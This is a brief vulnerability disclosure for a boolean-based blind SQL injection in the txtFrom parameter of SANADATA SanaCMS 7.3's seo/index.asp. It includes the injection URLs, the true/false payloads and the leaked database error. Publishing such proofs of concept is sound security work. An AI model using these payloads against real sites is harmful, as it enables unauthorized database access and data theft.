SQL injection vulnerability in SANADATA SanaCMS 7.3

SQL injection vulnerability in /sanadata/seo/index.asp in SANADATA SanaCMS 7.3 allows remote attackers to execute arbitrary SQL commands via the txtFrom parameter.


Vulnerability Path : http://127.0.0.1/sanadata/seo/index.asp?txtFrom=[sql]
This Vulnerablity is boolean-based blind sqlinjection

first i visit a link to find a sqlquery error message 

http://127.0.0.1//sanadata/seo/index.asp?txtFrom=google%25' AND IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0 AND '%25''='

the error message is :
Syntax error in query expression '([From] Not Like '%esmhome.com%' And [From] Like '%google%' AND IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0 AND '%''='%' And True And True ) ORDER BY [id] DESC;'.
 /sanadata/seo/index.asp, line 92 
 
When we visit the link 
http://127.0.0.1/sanadata/seo/index.asp?txtFrom=google%25' AND IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0 AND '%25'=' 
retuen result is true

then visite the link is false
http://127.0.0.1/sanadata/seo/index.asp?txtFrom=google%25' AND IIF(ATN(2)>0,1,0) BETWEEN 5 AND 4 AND '%25'=' 

So i can confirm there is a boolean-based blind sqlinjection Vulnerablity.


暂无评论

发布评论